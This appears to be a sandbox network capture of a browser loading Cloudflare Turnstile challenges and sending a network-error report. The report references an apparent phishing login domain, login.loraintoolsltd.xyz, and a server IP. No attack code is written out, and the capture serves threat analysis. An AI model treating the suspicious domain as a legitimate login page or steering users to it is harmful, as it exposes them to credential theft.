2025-01-23 23:03:23 UTC	1369	IN	Data Raw: 4d 6c 32 42 75 64 48 47 58 65 61 53 6e 71 6e 74 37 71 33 43 49 71 47 78 72 70 6f 61 71 69 59 4f 56 70 61 75 56 6a 63 47 4e 69 70 31 38 75 49 57 54 6b 4d 65 64 6f 73 69 62 79 61 48 4e 6d 70 75 53 77 38 7a 46 6e 38 43 6d 71 70 4c 53 70 37 58 62 32 70 65 73 32 73 2b 78 6e 73 57 6f 77 4d 62 6d 6e 74 65 37 70 2b 72 52 7a 39 50 66 33 75 33 57 75 4f 76 72 75 50 72 32 39 66 66 68 2b 67 50 55 75 39 76 68 76 63 50 63 35 65 44 49 39 64 30 48 2b 39 41 41 7a 65 7a 39 46 50 51 4a 7a 39 4c 72 45 50 73 54 43 75 2f 68 34 52 55 4e 41 50 76 68 4a 41 41 73 35 53 62 6e 49 43 72 74 36 43 55 45 49 69 50 79 38 43 55 36 4c 68 63 4e 39 42 73 33 44 54 41 4c 4e 52 62 38 51 68 30 48 4d 6a 6f 44 4b 52 78 47 4d 55 67 39 4f 31 42 4f 53 54 64 45 4c 6c 59 34 4c 6a 70 63 4f 57 46 52 54 32 Data Ascii: Ml2BudHGXeaSnqnt7q3CIqGxrpoaqiYOVpauVjcGNip18uIWTkMedosibyaHNmpuSw8zFn8CmqpLSp7Xb2pes2s+xnsWowMbmnte7p+rRz9Pf3u3WuOvruPr29ffh+gPUu9vhvcPc5eDI9d0H+9AAzez9FPQJz9LrEPsTCu/h4RUNAPvhJAAs5SbnICrt6CUEIiPy8CU6LhcN9Bs3DTALNRb8Qh0HMjoDKRxGMUg9O1BOSTdELlY4LjpcOWFRT2
2025-01-23 23:03:23 UTC	1369	IN	Data Raw: 6b 32 75 56 66 59 4e 74 71 72 47 69 73 57 39 76 73 36 39 78 67 36 61 47 72 58 71 36 73 4c 78 2f 67 4b 4b 34 66 72 4a 2f 75 34 48 42 6d 37 62 44 79 73 4f 72 77 38 53 51 6e 62 61 4f 6c 39 69 32 6b 74 72 62 75 74 48 4f 76 38 71 59 34 61 43 32 6f 4d 44 61 74 4b 53 34 7a 4b 4f 37 75 74 48 64 30 75 48 50 76 73 72 6d 32 65 36 78 74 2b 72 59 32 72 61 39 33 4f 72 36 31 50 4d 43 42 74 30 46 34 65 72 6b 7a 4f 6e 5a 34 41 76 66 30 39 41 4c 44 42 66 55 44 50 6b 63 38 68 66 2b 36 4e 77 50 33 65 33 35 45 66 55 63 38 68 38 67 49 2b 67 66 36 66 6e 37 49 2f 48 73 49 75 66 73 36 65 6f 32 4e 7a 50 35 39 55 44 38 4b 52 41 2f 4e 67 30 4f 52 54 34 5a 46 54 6b 4c 4b 68 64 4d 51 69 5a 42 4c 6a 41 78 52 43 70 4e 4c 6b 34 6f 52 78 30 38 56 46 6f 36 47 69 30 63 49 30 35 6a 50 56 46 Data Ascii: k2uVfYNtqrGisW9vs69xg6aGrXq6sLx/gKK4frJ/u4HBm7bDysOrw8SQnbaOl9i2ktrbutHOv8qY4aC2oMDatKS4zKO7utHd0uHPvsrm2e6xt+rY2ra93Or61PMCBt0F4erkzOnZ4Avf09ALDBfUDPkc8hf+6NwP3e35EfUc8h8gI+gf6fn7I/HsIufs6eo2NzP59UD8KRA/Ng0ORT4ZFTkLKhdMQiZBLjAxRCpNLk4oRx08VFo6Gi0cI05jPVF
2025-01-23 23:03:23 UTC	1369	IN	Data Raw: 49 4f 4c 6f 47 2b 47 6b 4c 57 73 69 70 4f 70 75 35 43 49 6b 34 2b 54 77 73 47 69 6c 71 43 58 70 71 65 53 73 38 54 4e 7a 5a 36 47 6e 72 36 78 6e 61 47 55 6c 74 6e 4a 70 37 44 52 78 36 32 6f 32 62 36 76 77 4e 6d 68 72 37 54 46 36 4b 48 4a 36 71 66 6f 32 61 37 6a 76 2b 72 30 31 4b 2f 75 38 39 6e 49 30 50 50 6c 38 73 2b 32 77 66 62 64 76 67 4c 6e 78 4d 63 47 78 76 6a 39 79 39 34 51 32 74 30 53 46 4e 51 52 37 64 55 57 46 77 6a 6d 47 39 54 55 35 2b 76 33 41 39 6b 67 32 2f 6f 45 43 65 63 4a 42 69 44 34 43 2f 30 48 45 2f 37 7a 4e 42 63 45 4e 7a 67 5a 38 51 55 34 48 77 33 37 50 43 49 52 4e 7a 63 75 2f 51 67 36 4b 78 67 49 53 43 78 43 43 7a 38 74 55 43 5a 48 50 6a 55 50 47 55 6b 4e 55 7a 42 56 46 78 4a 66 4f 42 6f 6b 4e 55 41 7a 50 43 68 42 52 79 4a 42 53 46 39 63 Data Ascii: IOLoG+GkLWsipOpu5CIk4+TwsGilqCXpqeSs8TNzZ6Gnr6xnaGUltnJp7DRx62o2b6vwNmhr7TF6KHJ6qfo2a7jv+r01K/u89nI0PPl8s+2wfbdvgLnxMcGxvj9y94Q2t0SFNQR7dUWFwjmG9TU5+v3A9kg2/oECecJBiD4C/0HE/7zNBcENzgZ8QU4Hw37PCIRNzcu/Qg6KxgISCxCCz8tUCZHPjUPGUkNUzBVFxJfOBokNUAzPChBRyJBSF9c

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:23 UTC	434	OUT	OPTIONS /api/report?catId=GW+estsfd+wst HTTP/1.1 Host: identity.nel.measure.office.net Connection: keep-alive Origin: https://login.loraintoolsltd.xyz Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-23 23:03:23 UTC	319	IN	HTTP/1.1 200 OK Content-Type: text/html Content-Length: 7 Date: Thu, 23 Jan 2025 23:03:23 GMT Connection: close Access-Control-Allow-Headers: content-type Access-Control-Allow-Credentials: false Access-Control-Allow-Methods: * Access-Control-Allow-Methods: GET, OPTIONS, POST Access-Control-Allow-Origin: *
2025-01-23 23:03:23 UTC	7	IN	Data Raw: 4f 50 54 49 4f 4e 53 Data Ascii: OPTIONS

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:24 UTC	599	OUT	GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1482238646:1737670630:gvnMz6WUq3EEzTkbKMXmY7htjMwlrnl7INcjpwYtlY0/906b6aa41d244405/ELjc5mh98hUEm9Vd49aH1pPIKJXUCZOHayyvUrkrAb8-1737673400-1.1.1.1-kX2zXm1bzZdEcwlyaL8ZR403rSDB27V0f.r9GcipcEjkQZUM30GkIGD4m3eKHVCe HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-23 23:03:24 UTC	442	IN	HTTP/1.1 400 Bad Request Date: Thu, 23 Jan 2025 23:03:24 GMT Content-Type: application/json Content-Length: 14 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cf-chl-out: 3D/1YM1Q8zXodfzL4hqukKeFOgOwwsa/siprT/4j422U3LfByiXrJFRmHCrVus6tAt7cfl4hj9CVS+Sh1oN65Q==$0+bzc7QOBjU1I9mXejG08g== Server: cloudflare CF-RAY: 906b6ab9beb6423b-EWR alt-svc: h3=":443"; ma=86400
2025-01-23 23:03:24 UTC	14	IN	Data Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d Data Ascii: {"err":100230}

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:24 UTC	367	OUT	POST /api/report?catId=GW+estsfd+wst HTTP/1.1 Host: identity.nel.measure.office.net Connection: keep-alive Content-Length: 446 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-23 23:03:24 UTC	446	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 34 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6c 6f 72 61 69 6e 74 6f 6f 6c 73 6c 74 64 2e 78 79 7a 2f 46 67 4a 49 6f 52 44 6d 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 33 2e 34 36 2e 38 30 2e 32 31 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f Data Ascii: [{"age":0,"body":{"elapsed_time":241,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://login.loraintoolsltd.xyz/FgJIoRDm","sampling_fraction":1.0,"server_ip":"173.46.80.217","status_code":404,"type":"http.error"},"type":"netwo
2025-01-23 23:03:35 UTC	371	IN	HTTP/1.1 504 Gateway Time-out Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 282 Expires: Thu, 23 Jan 2025 23:03:35 GMT Date: Thu, 23 Jan 2025 23:03:35 GMT Connection: close Access-Control-Allow-Credentials: false Access-Control-Allow-Methods: * Access-Control-Allow-Methods: GET, OPTIONS, POST Access-Control-Allow-Origin: *
2025-01-23 23:03:35 UTC	282	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 45 72 72 6f 72 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 32 32 31 26 23 34 36 3b 35 32 37 64 31 33 30 32 26 23 34 36 3b 31 37 33 37 36 37 33 34 30 34 26 23 34 36 3b 31 32 62 62 38 62 62 36 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 32 32 31 26 23 34 36 3b 35 32 37 64 31 33 30 32 26 23 34 36 3b 31 37 33 37 36 37 33 34 30 34 26 23 34 36 3b 31 Data Ascii: <HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY>An error occurred while processing your request.<p>Reference #221.527d1302.1737673404.12bb8bb6<P>https://errors.edgesuite.net/221.527d1302.1737673404.1

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:24 UTC	786	OUT	GET /cdn-cgi/challenge-platform/h/b/d/906b6aa41d244405/1737673403079/Dc1M9QxjEV7BqeA HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4vxoh/0x4AAAAAAA5pnBhoTgM91kpZ/auto/fbE/new/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-23 23:03:24 UTC	200	IN	HTTP/1.1 200 OK Date: Thu, 23 Jan 2025 23:03:24 GMT Content-Type: image/png Content-Length: 61 Connection: close Server: cloudflare CF-RAY: 906b6abb79a043af-EWR alt-svc: h3=":443"; ma=86400
2025-01-23 23:03:24 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 63 00 00 00 4e 08 02 00 00 00 bb 6b 3f 2a 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRcNk?*IDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:25 UTC	428	OUT	GET /cdn-cgi/challenge-platform/h/b/d/906b6aa41d244405/1737673403079/Dc1M9QxjEV7BqeA HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-23 23:03:25 UTC	200	IN	HTTP/1.1 200 OK Date: Thu, 23 Jan 2025 23:03:25 GMT Content-Type: image/png Content-Length: 61 Connection: close Server: cloudflare CF-RAY: 906b6abf9e72de97-EWR alt-svc: h3=":443"; ma=86400
2025-01-23 23:03:25 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 63 00 00 00 4e 08 02 00 00 00 bb 6b 3f 2a 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRcNk?*IDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:26 UTC	815	OUT	GET /cdn-cgi/challenge-platform/h/b/pat/906b6aa41d244405/1737673403088/1c87721852139d54858af8dcd971080e84136874a0279165c7e6dc4dec75dcbb/e8tYcQG-cFpJyCP HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4vxoh/0x4AAAAAAA5pnBhoTgM91kpZ/auto/fbE/new/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-23 23:03:26 UTC	143	IN	HTTP/1.1 401 Unauthorized Date: Thu, 23 Jan 2025 23:03:26 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 1 Connection: close
2025-01-23 23:03:26 UTC	2015	IN	Data Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 48 49 64 79 47 46 49 54 6e 56 53 46 69 76 6a 63 32 58 45 49 44 6f 51 54 61 48 53 67 4a 35 46 6c 78 2d 62 63 54 65 78 31 33 4c 73 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gHIdyGFITnVSFivjc2XEIDoQTaHSgJ5Flx-bcTex13LsAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
2025-01-23 23:03:26 UTC	1	IN	Data Raw: 4a Data Ascii: J

Timestamp	Bytes transferred	Direction	Data
2025-01-23 23:03:26 UTC	1176	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1482238646:1737670630:gvnMz6WUq3EEzTkbKMXmY7htjMwlrnl7INcjpwYtlY0/906b6aa41d244405/ELjc5mh98hUEm9Vd49aH1pPIKJXUCZOHayyvUrkrAb8-1737673400-1.1.1.1-kX2zXm1bzZdEcwlyaL8ZR403rSDB27V0f.r9GcipcEjkQZUM30GkIGD4m3eKHVCe HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 32464 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded CF-Chl-RetryAttempt: 0 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: ELjc5mh98hUEm9Vd49aH1pPIKJXUCZOHayyvUrkrAb8-1737673400-1.1.1.1-kX2zXm1bzZdEcwlyaL8ZR403rSDB27V0f.r9GcipcEjkQZUM30GkIGD4m3eKHVCe sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4vxoh/0x4AAAAAAA5pnBhoTgM91kpZ/auto/fbE/new/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-23 23:03:26 UTC	16384	OUT	Data Raw: 76 5f 39 30 36 62 36 61 61 34 31 64 32 34 34 34 30 35 3d 38 37 79 51 30 54 55 59 6b 79 79 57 71 65 59 54 2d 34 43 34 4a 65 52 55 25 32 62 34 75 34 55 30 53 48 52 59 47 55 4a 34 52 24 65 47 55 58 34 54 2d 48 34 59 34 62 59 51 4d 43 79 65 37 33 24 34 4b 52 34 63 67 79 34 75 34 65 71 34 4a 34 52 41 71 34 73 51 65 35 34 4a 45 4e 41 5a 4f 34 49 24 57 4e 34 65 47 39 6f 4f 34 2d 48 34 4d 34 62 24 53 24 77 34 57 30 39 64 47 74 51 54 71 55 30 34 38 71 55 4d 49 68 30 37 34 65 62 71 71 55 7a 63 63 61 6d 24 34 38 6b 51 59 6f 4c 54 4f 34 34 6a 55 47 4f 72 24 47 49 41 34 52 37 34 72 73 36 4e 77 69 61 39 2d 69 2d 41 44 36 24 68 47 63 45 41 31 6b 73 36 59 61 34 34 68 47 6b 35 34 79 4b 47 7a 6d 67 63 71 66 6f 41 7a 6b 62 64 39 4b 67 76 34 4c 45 62 56 69 6f 56 6e 2d 43 5a Data Ascii: v_906b6aa41d244405=87yQ0TUYkyyWqeYT-4C4JeRU%2b4u4U0SHRYGUJ4R$eGUX4T-H4Y4bYQMCye73$4KR4cgy4u4eq4J4RAq4sQe54JENAZO4I$WN4eG9oO4-H4M4b$S$w4W09dGtQTqU048qUMIh074ebqqUzccam$48kQYoLTO44jUGOr$GIA4R74rs6Nwia9-i-AD6$hGcEA1ks6Ya44hGk54yKGzmgcqfoAzkbd9Kgv4LEbVioVn-CZ
2025-01-23 23:03:26 UTC	16080	OUT	Data Raw: 50 4d 79 63 79 2d 44 53 71 79 48 34 6b 51 34 34 70 66 31 6c 7a 54 34 45 6a 51 76 37 38 34 34 51 34 67 75 6f 59 57 56 34 78 71 33 64 51 49 79 7a 51 65 6c 37 6c 78 31 6b 32 37 54 4d 4b 53 34 49 51 34 4f 51 4e 34 32 51 54 7a 34 39 34 52 59 57 2d 34 61 6b 32 79 54 79 51 73 67 34 48 55 53 34 69 34 65 51 55 59 34 50 53 7a 79 57 53 34 57 6b 54 34 55 41 34 4e 77 65 51 34 36 34 68 51 32 66 34 51 34 6a 51 79 71 34 66 34 63 34 35 37 55 71 24 43 51 61 71 55 33 34 53 37 33 37 54 6d 34 67 47 34 71 34 54 51 38 34 74 61 34 68 34 36 51 55 63 57 64 34 71 37 52 71 54 36 34 33 37 65 72 34 44 51 44 34 35 61 37 66 54 30 78 6f 2d 57 47 34 71 34 61 51 30 4c 34 30 51 52 6e 45 55 78 5a 44 45 2d 34 48 34 77 51 61 51 54 72 63 35 34 65 6b 54 4e 34 30 51 68 34 34 56 63 6e 79 52 24 57 Data Ascii: PMycy-DSqyH4kQ44pf1lzT4EjQv7844Q4guoYWV4xq3dQIyzQel7lx1k27TMKS4IQ4OQN42QTz494RYW-4ak2yTyQsg4HUS4i4eQUY4PSzyWS4WkT4UA4NweQ464hQ2f4Q4jQyq4f4c457Uq$CQaqU34S737Tm4gG4q4TQ84ta4h46QUcWd4q7RqT6437er4DQD45a7fT0xo-WG4q4aQ0L40QRnEUxZDE-4H4wQaQTrc54ekTN40Qh44VcnyR$W
2025-01-23 23:03:27 UTC	322	IN	HTTP/1.1 200 OK Date: Thu, 23 Jan 2025 23:03:27 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 27168 Connection: close cf-chl-gen: h/3qMbUmjgcS1iRBO729B2TeE/QG8ASRZfPsrD0G/w2axbRm9XMGIoiDk0LKWGII$oCgZ7yTSKxHWPKlAq43b+Q== Server: cloudflare CF-RAY: 906b6ac9cac741a9-EWR alt-svc: h3=":443"; ma=86400
2025-01-23 23:03:27 UTC	1047	IN	Data Raw: 6b 4a 61 41 75 38 43 43 67 35 62 47 73 73 61 59 79 4d 4c 4c 72 34 62 4f 7a 38 36 46 30 62 48 53 69 64 57 50 6d 4b 37 5a 6d 4b 32 6e 34 62 71 68 75 61 47 58 77 4e 2b 6d 74 38 72 65 7a 61 76 59 7a 36 33 46 73 73 75 72 73 63 6a 4d 78 50 6a 47 31 74 66 52 79 73 72 36 2b 2f 48 58 33 75 55 41 31 64 59 4c 30 73 71 2b 42 73 34 4d 35 63 66 64 43 74 44 74 39 64 41 58 32 50 72 75 38 78 6a 6f 30 52 4d 67 34 65 38 66 2b 51 2f 79 33 76 33 2b 2b 2f 6b 5a 49 53 67 50 4c 65 67 6b 42 51 77 32 4a 78 6b 69 39 44 30 53 50 42 70 41 41 44 72 35 51 76 59 64 44 30 55 63 4a 50 78 4c 49 53 52 51 4c 68 41 70 48 79 73 71 55 31 55 30 53 43 52 52 56 69 39 61 48 7a 4a 4e 55 7a 63 61 46 31 4e 58 49 43 6c 6a 56 69 5a 43 57 30 59 6e 4d 55 31 76 61 6b 46 47 50 32 73 32 51 32 52 48 61 58 64 Data Ascii: kJaAu8CCg5bGssaYyMLLr4bOz86F0bHSidWPmK7ZmK2n4bqhuaGXwN+mt8rezavYz63FssurscjMxPjG1tfRysr6+/HX3uUA1dYL0sq+Bs4M5cfdCtDt9dAX2Pru8xjo0RMg4e8f+Q/y3v3++/kZISgPLegkBQw2Jxki9D0SPBpAADr5QvYdD0UcJPxLISRQLhApHysqU1U0SCRRVi9aHzJNUzcaF1NXICljViZCW0YnMU1vakFGP2s2Q2RHaXd
2025-01-23 23:03:27 UTC	1369	IN	Data Raw: 50 31 63 32 79 7a 6f 36 68 6f 74 61 36 7a 64 75 34 72 37 32 67 75 64 58 61 6f 64 53 37 33 71 58 56 74 2b 47 71 70 62 2f 6e 72 63 47 73 79 73 54 58 7a 64 69 34 36 38 66 54 74 76 75 36 34 72 76 30 42 76 37 33 34 64 76 64 78 2b 54 6a 34 77 38 4b 35 2b 49 52 35 73 33 4f 46 65 72 33 38 65 30 55 48 64 6e 70 39 52 72 62 48 42 62 79 2b 67 58 32 38 52 77 4c 34 2b 51 71 44 2b 66 6e 38 42 73 6f 43 6a 45 59 42 54 6f 35 4f 6a 51 63 39 2f 6e 2b 51 67 48 39 41 30 59 76 42 42 35 4a 43 41 4e 49 48 43 73 4a 4a 55 35 53 4d 79 64 42 55 69 45 73 49 6b 4d 7a 50 56 41 5a 4e 6b 41 68 53 30 30 79 57 47 4a 50 58 43 6c 6f 56 32 4a 49 61 54 31 44 4c 46 4e 66 5a 56 31 48 56 48 68 78 51 6c 46 6b 57 32 31 7a 64 7a 4e 69 65 32 55 38 59 30 42 59 66 33 4b 49 52 46 74 65 62 46 39 61 68 33 Data Ascii: P1c2yzo6hota6zdu4r72gudXaodS73qXVt+Gqpb/nrcGsysTXzdi468fTtvu64rv0Bv734dvdx+Tj4w8K5+IR5s3OFer38e0UHdnp9RrbHBby+gX28RwL4+QqD+fn8BsoCjEYBTo5OjQc9/n+QgH9A0YvBB5JCANIHCsJJU5SMydBUiEsIkMzPVAZNkAhS00yWGJPXCloV2JIaT1DLFNfZV1HVHhxQlFkW21zdzNie2U8Y0BYf3KIRFtebF9ah3
2025-01-23 23:03:27 UTC	1369	IN	Data Raw: 78 70 62 4c 7a 39 53 39 32 35 66 54 78 4e 53 76 32 72 69 36 71 64 71 70 71 4d 37 4d 34 36 36 78 35 74 54 74 38 62 37 78 72 39 62 4d 2b 39 6a 76 7a 63 33 67 38 39 49 45 76 2f 4c 56 78 65 45 49 31 4d 6b 44 2b 51 72 4e 41 75 62 77 34 51 30 4d 37 77 6b 4b 30 78 66 72 46 75 6e 6f 48 43 45 67 44 50 48 66 4a 65 51 65 38 2f 73 69 39 51 45 47 42 69 50 37 37 51 54 77 49 6a 4d 4c 4a 51 6f 37 4f 77 59 55 2b 6a 4e 42 41 54 30 61 50 42 73 69 4a 7a 39 46 51 43 51 67 4b 53 45 4b 53 55 5a 53 55 43 6f 7a 52 52 64 55 4b 79 59 7a 4c 79 78 53 53 44 49 64 4f 6d 46 5a 48 54 41 77 4d 79 52 59 56 69 68 75 62 6b 51 34 4b 46 74 62 64 45 77 75 63 6e 4a 30 61 47 63 36 55 46 6b 2f 67 47 42 67 54 59 52 67 68 55 65 48 53 58 78 34 58 58 56 64 62 6f 47 45 65 6f 52 6b 58 5a 4a 56 57 48 52 Data Ascii: xpbLz9S925fTxNSv2ri6qdqpqM7M466x5tTt8b7xr9bM+9jvzc3g89IEv/LVxeEI1MkD+QrNAubw4Q0M7wkK0xfrFunoHCEgDPHfJeQe8/si9QEGBiP77QTwIjMLJQo7OwYU+jNBAT0aPBsiJz9FQCQgKSEKSUZSUCozRRdUKyYzLyxSSDIdOmFZHTAwMyRYVihubkQ4KFtbdEwucnJ0aGc6UFk/gGBgTYRghUeHSXx4XXVdboGEeoRkXZJVWHR
2025-01-23 23:03:27 UTC	1369	IN	Data Raw: 73 2f 68 30 62 66 44 72 74 7a 48 32 64 6a 67 35 65 47 37 71 37 6a 51 33 71 33 31 78 64 54 6d 35 37 6a 6d 78 4e 48 4e 38 63 33 4b 79 39 66 41 32 63 58 7a 35 39 37 71 2f 72 33 33 35 77 59 4a 7a 39 7a 4b 2f 4e 34 4a 45 50 41 52 30 65 66 4e 44 77 37 76 2b 78 62 67 49 2f 66 34 38 43 41 47 45 79 72 37 39 43 6a 66 37 67 7a 74 4a 77 34 4e 4b 2f 45 6a 4c 43 6b 51 4c 42 62 7a 4c 77 6b 75 4c 44 6b 57 51 44 6f 5a 4f 43 52 47 43 69 49 62 42 55 73 69 41 68 42 52 50 55 30 68 56 77 6c 42 4c 79 64 62 4e 44 73 39 46 79 6c 4c 48 69 34 64 48 6c 5a 53 55 6c 4e 68 53 7a 6b 2f 57 43 64 48 57 53 6f 74 51 6d 6c 45 61 6a 5a 33 61 45 5a 78 50 58 5a 62 61 56 45 39 59 31 45 2b 55 33 38 2f 55 33 31 59 69 47 70 5a 61 33 31 78 5a 47 71 50 63 33 65 41 59 46 61 49 6a 58 4b 4e 62 32 78 30 Data Ascii: s/h0bfDrtzH2djg5eG7q7jQ3q31xdTm57jmxNHN8c3Ky9fA2cXz597q/r335wYJz9zK/N4JEPAR0efNDw7v+xbgI/f48CAGEyr79Cjf7gztJw4NK/EjLCkQLBbzLwkuLDkWQDoZOCRGCiIbBUsiAhBRPU0hVwlBLydbNDs9FylLHi4dHlZSUlNhSzk/WCdHWSotQmlEajZ3aEZxPXZbaVE9Y1E+U38/U31YiGpZa31xZGqPc3eAYFaIjXKNb2x0
